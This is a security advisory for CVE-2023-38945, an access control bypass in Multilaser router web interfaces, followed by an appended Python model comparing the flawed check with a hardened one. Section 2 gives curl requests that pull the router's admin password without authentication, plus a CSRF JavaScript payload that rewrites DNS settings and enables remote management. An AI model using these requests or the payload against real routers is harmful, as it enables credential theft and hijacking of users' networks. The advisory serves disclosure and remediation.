Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

Packet Storm
=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38945]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes
  < vinicius.moraes.w () gmail com >

=====[Table of Contents]========================================================

1. Overview
2. Detailed description
3. Other contexts & solutions
4. Acknowledgements
5. Timeline
6. References

=====[1. Overview]==============================================================

* Systems affected: Multilaser RE160 web interface  - V5.07.51_pt_MTL01 (verified)
                                                    - V5.07.52_pt_MTL01 (verified)
                                                    (other routers/versions may be affected)
                    Multilaser RE160V web interface - V12.03.01.08_pt (verified)
                                                    - V12.03.01.09_pt (verified)
                                                    (other routers/versions may be affected)
                    Multilaser RE163V web interface - V12.03.01.08_pt (verified)
                                                    (other routers/versions may be affected)

* Release date: 28/02/2024

* CVSS score: 7.7 / High

* CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

* Impact: This vulnerability allows attackers to bypass the access control of
          the routers' web interface and perform management actions, such as
          changing the DNS settings, enabling router remote access, changing the
          IP routing table, and retrieving the WiFi and management application
          passwords. A noteworthy aspect also regards the fact that the attack
          can be conducted remotely.

=====[2. Detailed description]==================================================

The affected Multilaser routers have a web management interface designed to
graphically assist users in configuring features and diagnosing problems.
However, there is a bug in its access control mechanism that allows
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to add a specific extension at the
end of the URLs. Some acceptable extension values are: js, css, png, jpg, gif,
jsp. The following example shows how an unauthenticated user (not bearing a
credential or session token) could perform it by using the curl tool[1] to
retrieve, for example, a backup of the RE160 router config, which contains its
web interface password:

[snippet]
$ # traditional unauthenticated request being redirected to the login page
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|Locatio'
HTTP/1.0 302 Redirect
Location: http://[routerIpAddress]/login.asp
$
$ # malicious unauthenticated request getting the web interface password
$ # (in this example: "pass123")
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E 'HTTP/|http_pass'
HTTP/1.0 200 OK
http_passwd=pass123
[/snippet]

Furthermore, the next example presents part of a JavaScript code that could be
added to a malicious website with the purpose of changing the router's DNS
address and enabling remote access on vulnerable RE160V and RE163V routers.
This can be achieved by exploiting this access control issue and a CSRF[3]:

[code]
fetch('http://[routerIpAddress]/goform/setSysTools/.js', {
    'method': 'POST',
    'mode': 'no-cors',
    'headers': {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    'body': 'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'
})
[/code]

By performing the aforementioned steps, an attacker can gain access to all
features of the web interface.

This vulnerability can be exploited remotely via a malicious website or a
mobile/desktop application performing HTTP requests against the router, and
also locally, by connecting to a vulnerable router (such as through the wireless
infrastructure of a coffee shop or airport).

=====[3. Other contexts & solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request must
always validate the session token in authenticated features as a prerequisite
for enforcing access control, regardless of any extension in the URL. Upon not
receiving a valid session token within the request, users should be redirected
to the login page.

Practically, to mitigate this issue, the RE160V should be updated to firmware
V12.03.01.12 or newer[4], and the RE163V to firmware V12.03.01.10 or newer[5].

Multilaser informed that they contacted the firmware vendor of the model RE160,
but due to the age of the equipment and its limitations, it will not receive an
update to fix the issue. Therefore, it is recommended to replace the RE160
router with a new one that has received the fix (such as RE160V or RE163V).

=====[4. Acknowledgements]======================================================

  Joaquim Brasil de Oliveira
  < palulabrasil () gmail com >
  < twitter.com/palulabr >

  Tempest Security Intelligence[2]

=====[5. Timeline]==============================================================

13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10) fixed
             the bug;
28/04/2023 - The bug regarding model RE160V was reported to the vendor;
29/06/2023 - A new contact was made with the company;
29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;
07/07/2023 - The same bug in model RE160 was reported to the vendor;
16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where the
             bug was fixed;
26/10/2023 - Vendor informed that RE160 will not receive a fix;
26/10/2023 - Vendor released the RE160V update on its website[4].

=====[6. References]============================================================

  [1] https://curl.se
  [2] https://tempest.com.br
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152
  [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v
  [5] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v
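The following is an added illustration, not code from the advisory or from the router firmware: a constructed model of the access-control decision, with the suffix-based exemption the advisory describes beside the fix from section 3 (classify the request by the feature it reaches and require a session token for every management endpoint, whatever extension is appended). The session store, the `/static/` asset directory and the request samples are all constructed assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed model of the advisory's bug; none of this is the router's code.
STATIC_EXTENSIONS = {"js", "css", "png", "jpg", "gif", "jsp"}  # exempt list per the advisory
PUBLIC_PATHS = {"/login.asp"}        # reachable without a session (from the advisory's redirect)
PUBLIC_DIRS = ("/static/",)          # assumed directory for genuine, public assets
VALID_SESSIONS = {"s3ss10n-constructed"}  # constructed session store


def _normalize(path: str) -> str:
    """Decode percent-encoding, drop the query string and collapse '/./', '/../' and '//'."""
    return posixpath.normpath(unquote(path.split("?", 1)[0]))


def vulnerable_gate(path: str, session: Optional[str]) -> str:
    """Flawed logic as described in section 2: if the URL's last segment carries a
    'static' extension the request is served with no session check at all, so
    '/cgi-bin/DownloadCfg/.js' passes while '/cgi-bin/DownloadCfg/C.cfg' is redirected."""
    last = path.rsplit("/", 1)[-1]
    if "." in last and last.rsplit(".", 1)[-1].lower() in STATIC_EXTENSIONS:
        return "200 OK"
    if path in PUBLIC_PATHS or session in VALID_SESSIONS:
        return "200 OK"
    return "302 /login.asp"


def hardened_gate(path: str, session: Optional[str]) -> str:
    """Conceptual fix from section 3: public content is an explicit allow-list keyed
    on the normalized path, and everything else (all /cgi-bin/ and /goform/ features
    included) needs a valid session token regardless of the URL's extension."""
    normalized = _normalize(path)
    if normalized in PUBLIC_PATHS or normalized.startswith(PUBLIC_DIRS):
        return "200 OK"
    return "200 OK" if session in VALID_SESSIONS else "302 /login.asp"


# Constructed sample requests mirroring the advisory's curl and fetch examples.
SAMPLE_REQUESTS = [
    ("/cgi-bin/DownloadCfg/C.cfg", None),
    ("/cgi-bin/DownloadCfg/.js", None),
    ("/goform/setSysTools/.js", None),
    ("/static/../cgi-bin/DownloadCfg/C.cfg", None),  # traversal into a protected path
    ("/cgi-bin/DownloadCfg/C.cfg", "s3ss10n-constructed"),
]


def compare(requests):
    """Run each (path, session) through both gates -> {(path, session): (old, new)}."""
    return {(p, s): (vulnerable_gate(p, s), hardened_gate(p, s)) for p, s in requests}


if __name__ == "__main__":
    for (p, s), (old, new) in compare(SAMPLE_REQUESTS).items():
        print(f"{p:40} session={s is not None!s:5} vulnerable={old:15} hardened={new}")
```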
